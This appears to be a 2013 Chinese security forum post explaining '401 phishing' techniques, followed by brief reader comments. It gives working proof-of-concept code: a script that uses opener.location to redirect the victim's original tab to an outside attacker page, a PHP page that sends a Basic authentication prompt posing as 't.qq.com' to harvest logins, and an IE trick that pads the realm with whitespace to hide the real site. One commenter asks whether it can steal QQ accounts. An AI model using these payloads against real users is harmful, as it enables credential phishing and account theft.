401钓鱼新玩法

前段时间401钓鱼很火,大部分呢是通过向网页插入一个401地址的图片进行钓鱼.但这种方法对于chrome和不支持外链图片的站来说,例如:微博.

反向401钓鱼:

反向401的意思是通过opener.location反向控制调用页地址到401钓鱼页面.

poc:

opener.location='http://mmme.me/401.php'

close();

401.php:

<?php

header('WWW-Authenticate: Basic realm="t.qq.com"');

?>

<script>

history.back();//返回到腾讯微博

</script>

缺点:IE不支持.

腾讯微博demo

IE空白符缺陷:

由于IE的401询问框设计错误,导致我们可以在服务器响应的认证提示信息后面追加大量的空白符将后面的默认内容挤掉,达到欺骗的目的.

POC:

<?php

header('WWW-Authenticate: Basic realm="t.qq.com                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "');

?>

IE8:

IE9:

http://pkav.net/2013/01/314.html

1#Xhm1n9 | 2013-01-01 13:00

嘿嘿,学习了

 

2#空城 (‮) | 2013-01-01 13:40

学习了

 

3#/fd (Http://prompt.ml) | 2013-01-01 14:11

opener.location這個貌似已存在很久,轉頁釣魚也可以

 

4#鬼哥 | 2013-01-01 15:16

思路不错。

 

5#se55i0n (那些年,我们一起看的岛国动作片~) | 2013-01-01 22:45

nice

 

6#汉时明月 (‮……核审在正长超名签 :) | 2013-01-02 21:47

学习

 

7#El4pse | 2013-01-04 10:54

好长一截啊

 

8#/fd (Http://prompt.ml) | 2013-01-04 13:41

說起來Clickjacking 這類大膽想法好像甚少有案例

 

9#shine | 2013-01-04 13:46

@/fd 楼上使用的都是繁体字,非大陆用户?

 

10#/fd (Http://prompt.ml) | 2013-01-04 13:47

@shine 香港

 

11#Wdot | 2013-01-04 13:52

这个空白符确实有点蛋疼

 

12#紫林 (小白一个求知识) | 2013-09-21 15:26

貌似这个可以盗QQ?

 

13#MEng | 2013-09-21 16:44

又涨知识 了

 

14#爱上平顶山 | 2013-09-21 19:36

0.0

 

15#黄小昏 | 2013-09-21 21:10

涨姿势了